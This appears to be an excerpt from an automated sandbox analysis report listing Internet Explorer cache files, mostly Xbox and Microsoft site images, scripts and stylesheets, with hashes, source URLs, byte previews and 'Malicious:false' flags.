                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d.............;.......................................................................................W........!.1AQ."a.2q..#B...R..3Cbr...$S...............%&'()*456789:DEFGHIJc..TUVWXYZdefghijstuvwxyz...............................................................................}.......!1..AQ.."2aq........#BR..b$3r............%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...................................................................................?.zoS.e.r2kc........R...x0w......`.v.......U=.j-.._.......SzI.8=..`..W.4.R......i.>;......T..NI..>.2.....Z*n@\gV)....6..>..(.V...-B....9..B)........y.f.FY....Z#...3...L =. .H.....$..}..Rm.g.\..A.....ih'P..0..oO.Es.U.Q....so|......._c.8..Z...y....I.>S.....f..|....(.3.Kh#..j.1..yej~>9=R.(..o...........U..)...i..#.J...I...W):R.'.|w.;..W..2.t.......=.|.E...T........
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\bullet[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):447
                                                                                                                                                                                                              Entropy (8bit):7.304718288205936
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                                                              MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                                                              SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                                                              SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                                                              SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:res://ieframe.dll/bullet.png
                                                                                                                                                                                                              Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\c05324ab-bc31-43f3-be7a-f891814fe313[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1067x600, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):110271
                                                                                                                                                                                                              Entropy (8bit):7.941220790854426
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:hMUsuIjT48+TOwuWCH3oMTZp7I+UNX30NO5VUmK5gfgSaXeAmwJAsVhrBr59v8vY:h3Y8Dfxm3oYp7jxNKVUj5UjARnhTEY
                                                                                                                                                                                                              MD5:6223E6E181804144AA4DF27056033BA0
                                                                                                                                                                                                              SHA1:3868CBA13824F7388E307E0F19897012A56D6A6A
                                                                                                                                                                                                              SHA-256:0071BB6CACFDDE377997483F3A54AFD62A89F41AFED66500CF12B016CC919CFE
                                                                                                                                                                                                              SHA-512:C934530526AA4395C0B0CACF81AEF58802F6D2121A81A490E9CD02CA054B1F2B698B92AD0AF0B113F5632E764012F1A08B081D48411DB394EB69A8CBF08F5F5F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/c0/53/c05324ab-bc31-43f3-be7a-f891814fe313.jpg?n=AAPIHM-2021_Small-tout-0_1067x600.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d...........X.+....................................................................................._........!.1A..Qa.q..."2......#BR...br.3C...$4cs..........%&'()*56789:DEFGHIJSTUVWXYZdefghijtuvwxyz..........................................................................................!1.AQa.q."2B...R..............#$%&'()*3456789:CDEFGHIJSTUVWXYZbcdefghijrstuvwxyz........................................................................................?.y....^u...bW.`..X%y......R....:.%..:../<.<W.b{..J...Y.|..cU.X^y..q..Q.\J1...X/<.\I.}'...I...._N......0... .^y.k.:.\u....Z..cx.9.i.....{mH9..\....IS....3%f+e].#..r.(.....MJ.y......i..SH.za...M../...b....W..X.g..r^..A.r....Sas.kG..7)&.R[t.bqo.wE....e-.........D......."(./.;....p...g.mkZ..%vc'h.....|CX..q.pC..........9..q.U...].4......@.\n.&.sV...3~.2.o..{4.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\c1cc1ba3-095c-460d-8760-48e8ed3d68b0[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 475x534, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):80702
                                                                                                                                                                                                              Entropy (8bit):7.967006708694881
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:6rubQP4WlVVMFq4xLolpEseGAQ3PEPsN1bmmgkE7ho6SofZGqOOxs3/NkdoiXmzs:wIWl8MS0C+ikD6HfZGGxY/OXAvgGP0rX
                                                                                                                                                                                                              MD5:B06B96D93F9410C6C244682AE6CE2C93
                                                                                                                                                                                                              SHA1:C89265299A8F0C31F5E36345CC9EA237E511B800
                                                                                                                                                                                                              SHA-256:188C1E287C473A3D35ABEA04E21BF308604A8C283BAE19E68DDCD907926AB404
                                                                                                                                                                                                              SHA-512:2DEB7AD0559471AFBCB1F66F17E1970D2D0F3A503D81C701650D3281DC9A1D2C9EA067997F992306112F62A4BFBD02033E74E654CE9B3C726DF21264AFC86B4A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/c1/cc/c1cc1ba3-095c-460d-8760-48e8ed3d68b0.jpg?n=XGP-2020_Small-tout-1084_475x534_02.jpg
                                                                                                                                                                                                              Preview: .............................................................................................................................................<....Adobe.d...................................................................................................m...........!.1."AQa..2q.BR.....#$b..3....7CDSTdrt...........%&'()*45689:EFGHIJUVWXYZcefghijsuvwxyz...............................................................................q..........!1.A."2Qaqr..$...4B...R............#%&'(b..)*356789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.jq......a..0...a..0...~c.?1.....y.x..l.....$....;.....#.&.GJ.j..#.....sSh.U.9l....).|...g.I5*.G...9.D$.....&......f...(..(......A...2......<.W{.:.pf....p.;.J.TpY......}n..%.|.].A...e...)z)..|.;J.r^.2.2.. .~.z..s...*.\.k.qN.)9.\.-..Q..Be.}.c..3..-..Co.KVi.W%..eJ=..%.~.{6d+..Z........{.....|.,."....GWR..B.q....l6....L.h.wj....Uy]..U...."..A...?Un}.......K.y+.;..;U.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\c9-860587[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):329682
                                                                                                                                                                                                              Entropy (8bit):5.296688492641936
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:xAuXzUqR1s9g0qRORPvksdmXc73pNq9a22j:xvzUBg4ga
                                                                                                                                                                                                              MD5:CEBF4A036C9F45F3EAE914A36628397F
                                                                                                                                                                                                              SHA1:805EB3FC183B6FF628CB52D87131EB465D98D271
                                                                                                                                                                                                              SHA-256:AC9AC8FC6105F1790B2F54E3A3DF6CA227686251B6B4156E2720DD988FE1B723
                                                                                                                                                                                                              SHA-512:1D67D12EA3C2D523D45F518FE45A635BA57293BCF49666721A942BD8D7F664FFB5A2E6A1B090EC539A5F64876088B34B05F5D1D01A0DC0EC989F4EAF78DC4B05
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/mscomhp/_scrf/js/themes=default/e1-a50eee/e7-954872/77-04a268/11-240c7b/5c-0bb0c0/81-a5a694/2f-63ce8f/6a-f6eed8/dc-7e9864/4f-5115f8/7d-266f10/4a-abd94b/ab-b04110/fd-7cc407/a4-fd2a9b/7b-131f20/66-c19a96/d0-633018/74-b70f5f/84-e0fd46/cb-abee28/1d-c29f1e/80-c05e42/a5-ef9ca1/f8-6a3735/b8-96db64/b4-d9c6d1/59-aa2448/d5-2b21b0/c5-346220/d6-6bf74f/83-4aa3b9/b8-527d75/57-0776c0/7a-fdafe7/18-91dd3c/88-3094ff/bf-4fabe5/f3-89463b/12-fd63db/85-b1c94b/6a-582442/64-02965a/37-f22d3d/33-eb67f7/fb-890cea/c9-860587?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: define("componentFactory",["require","exports","htmlExtensions","utility","stringExtensions"],function(n,t,i,r,u){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var f=function(){function n(){}return n.create=function(t){for(var i,r=0,u=t;r<u.length;r++){if(i=u[r],!i.c&&!i.component)throw"factoryInput should has either component or c to tell the factory what component to create.Eg.ComponentFactory.create([{ c: Carousel] or ComponentFactory.create([component: Carousel]))";n.createComponent(i.component||i.c,i)}},n.createComponent=function(t,r){if(t){var o=r&&r.eventToBind?r.eventToBind:"",f=r&&r.selector?r.selector:t.selector,s=r&&r.context?r.context:null,u=[],e=function(n,f,e){var a,c,l,o,h;for(a=r.elements?r.elements:f?i.selectElementsT(f,s):[document.body],c=0,l=a;c<l.length;c++)o=l[c],o.mwfInstances||(o.mwfInstances={}),o.mwfInstances[n]?u.push(o.mwfInstances[n]):(h=new t(o,e),(!h.isObserving||h.isObserving())&&(o.mwfInstances[n]=h,u.push(h)))};switch(o){case"DOMContent
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\contentPop2[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):149004
                                                                                                                                                                                                              Entropy (8bit):4.40748614014859
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:OzGznyXbzk54Vk9qVOIXWetTQ8NUJdLUPp:OqjebNUJd8p
                                                                                                                                                                                                              MD5:3D1AE510500F9953688BA5E401BFD83D
                                                                                                                                                                                                              SHA1:819D1F782703BBC584FE2E97B86828221CF7D546
                                                                                                                                                                                                              SHA-256:2D65349934ED52C86B95270D45F54FB81C67EB67C3B36E15E25A856D9E744374
                                                                                                                                                                                                              SHA-512:1CF537C1D765FF010FC84F6011002013C5D6AF82584ACA7419922E1C288562A4E24DA4476B7FFF916BDCFE088A501F851001FD32E14633A564F4027E3FB38FA5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-US/home/js/contentPop2.js
                                                                                                                                                                                                              Preview: // popup video setup 1 - comment out when no popup in any locale.var urlRegion = document.URL.toLowerCase().split("xbox.com/")[1].slice(0, 5);.var popuplocales = "en-";.if (urlRegion.indexOf(popuplocales) !== -1) {. $("body").addClass("blackout"); // add back for popup.}.// end popup set up ..$(document).ready(function() {. // setup for video popup 2 - comment out when no popup in any locale. if (urlRegion.indexOf(popuplocales) === -1) {. $(".videopopup").html("");. $(".videopopup").addClass("pophidden");. $(".videopopup").removeClass("videopopup");. }. // end popup setup. var screenwidth = $(document).width();. if (screenwidth < 1080) {. $(".blackout").removeClass("blackout");. } else {. $(".pophidden").removeClass("pophidden");. }. . if (urlRegion === "en-ae") {. urlRegion = "ar-ae";. } else if (urlRegion === "en-sa") {. urlRegion = "ar-sa";. } else if (urlRegion === "en-il") {. urlRegion = "he-il";. }..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\css[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):143792
                                                                                                                                                                                                              Entropy (8bit):5.380440401000318
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:jbQbQbpPBUtdVoW4j7mb8Kjg0Opwv62zj9NGZdje3mdz5Amwih6u3LjWG58OOg/v:jcc5pp2zjnv3mN5VFh6u3LjR5v
                                                                                                                                                                                                              MD5:210D976F6F8131C3E335E330A53F4E01
                                                                                                                                                                                                              SHA1:BBF60A5AF4F20312CE65CE79490BC06160CDE04F
                                                                                                                                                                                                              SHA-256:D5B65695391D9739165E331D56512DA07D4DE09AC29AB908D3FEC8437FDAF015
                                                                                                                                                                                                              SHA-512:6145FBD5E2B6BF8D6B7536DBD4FA8C97CA7FA2AD3AE29DEC87633BDD66B31616608955CBA48C47A84208498612F69AE4A7FEA11ECDD89F360FA918C0913A3DD0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/SocContent/css?v=2eS0xWHCnh8ZTVf3yTPnMESVvXHGGElosLhiM3B3g0E1
                                                                                                                                                                                                              Preview: @font-face{font-family:'OffSMDL2';src:url('/socfonts/OffSMDL2.4.00.woff') format('woff')}.HeaderUIFont{font-size:10pt;font-family:'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif;font-weight:300}.HeaderUIFont.macexcel,.HeaderUIFont.maconenote,.HeaderUIFont.macoutlook,.HeaderUIFont.macpowerpoint,.HeaderUIFont.macword{font-family:-apple-system,'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif}.HeaderUIFont.macexcel,.HeaderUIFont.maconenote,.HeaderUIFont.macoutlook,.HeaderUIFont.macpowerpoint,.HeaderUIFont.macword{font-family:-apple-system,'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif}.FooterUIFont{font-size:9pt;font-family:'wf_segoe-ui_semilight','wf_segoe-ui_light','Segoe UI Light','Segoe WP Light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Ta
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\d7-de3320[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):394823
                                                                                                                                                                                                              Entropy (8bit):5.30161002536564
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:1fwtwmyU4srxCqFOp03Mw1+/cg3poEjOJ2MVuGiHr6LkQ:xawmxxn917q+
                                                                                                                                                                                                              MD5:B2FD768947568A5662CCF6BB997A5A8E
                                                                                                                                                                                                              SHA1:C2698A8F72DDB52155597968DE2F6F9806A3ED0A
                                                                                                                                                                                                              SHA-256:C1C2570AF78E579B706B5C4DD7EFD9247189F4B5634AE20119B25135C5CDF48F
                                                                                                                                                                                                              SHA-512:6520DA3315900BCC4C0A860E5A33CE31CD548105115630D6A0FBEA11E2E561F5D3BF9529BACFEA580D09BB0E04BDB286F4EA4F918FB31B0013EE21EC209B5822
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/MICROSOFT-365/_scrf/js/themes=default/9e-6ade99/b4-ce5167/2b-b6ab60/7e-a075ed/28-8f59e1/1e-b84759/58-f3fc85/d6-6e76d0/19-9c8e36/a3-e4fa11/b2-9d8af8/66-afd0b6/f5-7e27a5/d7-de3320?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: define("notificationBanner",["jqReady!"],function(n){"use strict";function i(){var o=document.querySelector(t.id),f,i,s,e;if(o)for(f=o.querySelectorAll(t.clsMessage),u(),i=0;i<f.length;i++)if(s=f[i].getAttribute("data-sel"),e=document.querySelector(s),e){var h=f[i].getAttribute("data-pos"),c=n(f[i]).clone(),l=c[0];r(e,h,l)}}function r(i,r,u){try{switch(r){case"replace":n(i).html(u);break;case"replaceText":n(i).text(n(u).text().trim());break;case"prepend":n(i).prepend(u);break;case"append":n(i).append(u);break;case"before":i.parentNode.insertBefore(u,i);break;case"after":default:i.parentNode.insertBefore(u,i.nextSibling)}i.classList.add(t.clsPosElement.substring(1));u.removeAttribute("data-pos");u.removeAttribute("data-sel");u.classList.add(t.clsActiveMessage.substring(1))}catch(f){}}function u(){for(var i=document.querySelectorAll(t.clsActiveMessage),n=0;n<i.length;n++)i[n].remove()}function f(){i();document.addEventListener("moduleRefreshed",i)}var t={id:"#ownb-wrapper",clsMessage:".o
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\e0946033-f538-48cf-9a36-09d98cb269ac[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 475x534, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):156471
                                                                                                                                                                                                              Entropy (8bit):7.983187296538617
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:M7X0EIWwcgG7DxXvVJn3QNv96rst2jPVHtDAx7xDdtz6lIue8T85p4IU8kr:YEEIWwcgG7NdJngR964tevGxf6Oue8Mq
                                                                                                                                                                                                              MD5:BFB4D2840127A58028CE692674DA55FC
                                                                                                                                                                                                              SHA1:9FA17362BF1F79EF13FEB2FD2C1498034C864036
                                                                                                                                                                                                              SHA-256:16AF472598446486D6D5BDD25C3D24AF3D1FE1BC4AFA4FFB368D7DB6C55E329D
                                                                                                                                                                                                              SHA-512:0C11A4F4D95783ADADB25203083CE5192E47314D0E48FE7527CB41C4479E5456CF7BE2B7138331813EF6B3BAE184A49AA9CDF1C1BDED7DD34F466C0D80FEEB3C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/e0/94/e0946033-f538-48cf-9a36-09d98cb269ac.jpg?n=Mass-Effect-Legendary-Edition_Small-tout-1084_475x534.jpg
                                                                                                                                                                                                              Preview: .............................................................................................................................................<....Adobe.d...........................................................................................................!.1."AQ..aq#2...B..3Rb....$r.....%4CS...csT..........................!..1A.Qa."q...2....BR...#br.....3.$...C..Sc.%s............?........:.....;.Gmm. .Y....a..($.8 ......W,.dm..c.r?C.J........79..+....+....#.q,....b..y...lL.......f.........e.+..?q...w...b....;.(q.1.}....fI.i.I....b...8...4.%.N....k.8......I.V.&.$A(.!!e\..8.7`..y.R ..B. .....<.}q.J..rC.....s.?.}(..-.,.'...o^O:.....A)...o...\L....nWvH..Q.W.y.5.......r.]@.)..U0.v....^4...........9.._..7..O....S."U...}r.D...%5Lf...d.6.R8...s.....!5.k.sL....#."r..s.;c..rVY.f..K.DP..6.........O'..\K.MkCtZ..t{......9....%Y#.......N6....r........w.B..c..].V...Te.....w.#..H..+....8..6..\.A.I..d......Z.O..%N....i..C..^uD.xy.v.l.!...,.8.vX....MS.m....]..R..T.9c..\
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\e0caf063-f36c-4423-b577-7d77afef6303[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1904x805, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):205560
                                                                                                                                                                                                              Entropy (8bit):7.909335437985433
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:KLASJT/ZyypA1zKk6Lb7qEgWVAEXqeiLzn+srA:K02/ZyypA1zKk6f7HnXZAn+f
                                                                                                                                                                                                              MD5:5D172CB1FC7F92DBD9888DD753CC6F66
                                                                                                                                                                                                              SHA1:2B77C59C834C660AD309BFE49C20F85EA785EE9C
                                                                                                                                                                                                              SHA-256:2FB67695BFB9B68DF6A15508DE73AA6AA27CE7B60BDBDD27651A6758B49E8A81
                                                                                                                                                                                                              SHA-512:6577945DA888C2AEFF9BEE5E3A24C9DC1FC6426025D520392E15F8BFD734871C564D4769BA8CC87D40E064C840948404A1166CAD74325C50566329F4A4AC3378
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/e0/ca/e0caf063-f36c-4423-b577-7d77afef6303.jpg?n=XOG_Home-Hero-1084_3-21_1904x805.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d...........%.p......................................................................................k..........!1.AQ."2a.Bq..#R....35Cbrs...$.......%4SUc.........&'()*6789:DEFGHIJTVWXYZdefghijtuvwxyz...............................................................................}..........!1.AQ."2aq.3B....#...Rb..$Dr............%&'()*456789:CEFGHIJSTUVWXYZcdefghijstuvwxyz...................................................................................?..Pb.A.1. ....b.A.1. ....b.A.1. ..,c.....8...J.....Z`...%..p!..Rl-...~.i.....&cyX.'......4h.X$.f.b...[.&K/gLK..l..h..5..} .:....q.F.f.0...w.b6..{...&i_.....0......kgo. .{J..r[h.-wad.m.~.8.z_..t.CC.4.`d..dx..3b.}......oO6.&.<v........uqv.v1..4D....hM.V.x..w5.=..q.......b....wmCM..`.....v..9"#m....x...&..2GG..4..{*#/gl..o0B..y.Z.Q6.".N....'MKP.V.....g...5lM..sQ3..U.....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\e1e2a082-95e7-4a75-9237-aff6a3ecc3c8[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 475x534, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):50748
                                                                                                                                                                                                              Entropy (8bit):7.965688105184076
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:mStymUm9VVg21FqnLiFp0TEaxuE6zj8Ki/PJEgwvOVT36ItSGmJxml3zFlAa0GfQ:mStEm9VVg21EL9JsUWOx3qgl0GKvqM
                                                                                                                                                                                                              MD5:E4FD32DE4B9D4880E8960461C9D3E2C6
                                                                                                                                                                                                              SHA1:8AF9086311A1FA2ADE182B0CCA0F4E2F0065624A
                                                                                                                                                                                                              SHA-256:CE2C58F04633E5041EFA7F4C0167369D9D3AD40FA589B0F5482623878EE61E4E
                                                                                                                                                                                                              SHA-512:6546F3A6FFD07174A175E7C2FE7487E1E6D0FD2C108F5DDD05563CF21AE91121D8BF9B3C3DBA7D3B1359160E950A7621DB758018D9B644D3B52A230D036999A0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/e1/e2/e1e2a082-95e7-4a75-9237-aff6a3ecc3c8.jpg?n=AAPIHM-2021_Small-tout-1084_475x534.jpg
                                                                                                                                                                                                              Preview: .............................................................................................................................................<....Adobe.d..................................................................................................w..........!.1..AQa."q..2.....#Bb....r...3CRs...........$%&'()*456789:DEFGHIJSTUVWXYZcdefghijtuvwxyz...........................................................................................!1A.Qa"2Bq..R.....b..............#$%&'()*3456789:CDEFGHIJSTUVWXYZcdefghijrstuvwxyz.....................................................................................?..u..x..\:.....W...t.....?+.O.^<~J.#.x..".t.....\:~J......b.L)w_..h.^[I.7`.P....6:.'*.Pu...,..2.a..B...I.~.:.+..i..yH&,gXd.;.B.QA]..I.....B<.mx.......j.swe..*..<....aD...m.q..(.dBRI]..p.P).7:.`loj~.....mlK..`\x..0.@`...rQW`#.'e..N...S..1.3.V....Z4T.).........%5.|N...Jb.+...KD.......4..`....4.....r..Q..W.\*MI.9..w...F...a...................Sv.R.?.sX.'.4...9Y..n..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\e2ef2d5c-ade2-416c-b1d1-0680a2d4e6bd[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1920x720, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):164020
                                                                                                                                                                                                              Entropy (8bit):7.900400445938816
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:p7q0jN5Jw6J+ChK8hVEO84m6oKjRBLjeK/AwbVSc44D8k+lVOTZ/4:p7XjN5Jw6MchVDDIKj7L6K4TLa8kkoZw
                                                                                                                                                                                                              MD5:0B00065D81021CE9F73126A269E020C4
                                                                                                                                                                                                              SHA1:1F3214BC49FB30905C64083C1E22604C96703934
                                                                                                                                                                                                              SHA-256:DA18848EE5F5F866DCD29B472577021AC7D2C9F39E4D78F0D1B815FF71C8854F
                                                                                                                                                                                                              SHA-512:CEC4CE089D7E0889E434B354D52A2E91AB2076AC93B42A77808BBA4A887FE833DBBB007851FEB8BB2342A0C4215517A1CD02F220EDF1353FC02C233EC488B324
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/e2/ef/e2ef2d5c-ade2-416c-b1d1-0680a2d4e6bd.jpg?n=Resident-Evil-Village_Page-Hero-1084_1920x720_02.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d....................................................................................................w.........!1.A."Qa.q2...#B....3R..$br.....%C........&'()*456789:DEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................................!.1.AQa.."2....qr.............#$%&'()*3456789:BCDEFGHIJRSTUVWXYZbcdefghijstuvwxyz.........................................................................................?....u8...m.-A...A.....D.P...=..8..0..O.l.C..fZ..G..R......q...A..1.C..6./..Wx..q..j....XC..X..9.....}...(.;...`m.`.... ...........3..6$..g~ ....)q..eG..+..8....]&ZT..:...;.I..'^z.Z....QiSb..g\.9......)..4*P5.;[....[..Q...W.A#%\T.....m...Z..tJWKU..Zu.0.....5.......=s......[+#B...u.kaN...sI.?..."./..>`...+[T..X~.tn/....|..5...@..xl..Mu..j0..#m^.U..X...^./X...c.....\.|.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\e3-082b89[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):115935
                                                                                                                                                                                                              Entropy (8bit):5.227268037906654
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:RL0mRvoBVfpuzUHQcyAz7pxhX2OG+59gEkpCI+IX8BJWxFu209RhY8WOyd1EwgXB:fzUZpxJIS20y9d1EwgXA95KScDCE4+
                                                                                                                                                                                                              MD5:B2DB9DF212495A4A80F578B4F78011CC
                                                                                                                                                                                                              SHA1:05FE19F21DD21A33978320F6C98E5AF172BE66D2
                                                                                                                                                                                                              SHA-256:DC72DDD4F315831290600B8BA9D33F59CAC621E0E52E73AD6451829A9BA6EA6A
                                                                                                                                                                                                              SHA-512:EE86ED5278776CEB92B8C5D7061F1EB04E1A41BCABAE83E0E14B20862CD1112F5C7DCD567A8D510948DF05D6D2A1F9BE3A9B18ABFEBF3397C228D809EF907A11
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/MICROSOFT-365/_scrf/js/themes=default/c9-7b8600/2f-63ce8f/45-f9a0d4/aa-dc1460/2d-7a9063/dc-7e9864/4f-5115f8/7d-266f10/4a-abd94b/6d-c07ea1/9d-b58f60/f6-aa5278/cd-23d3b0/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/f8-73a5f2/79-499886/7e-cda2d3/69-13871c/b7-0ad59f/91-97a04f/1f-100dea/33-abe4df/17-f90ef1/e3-082b89?ver=2.0&_cf=20210415
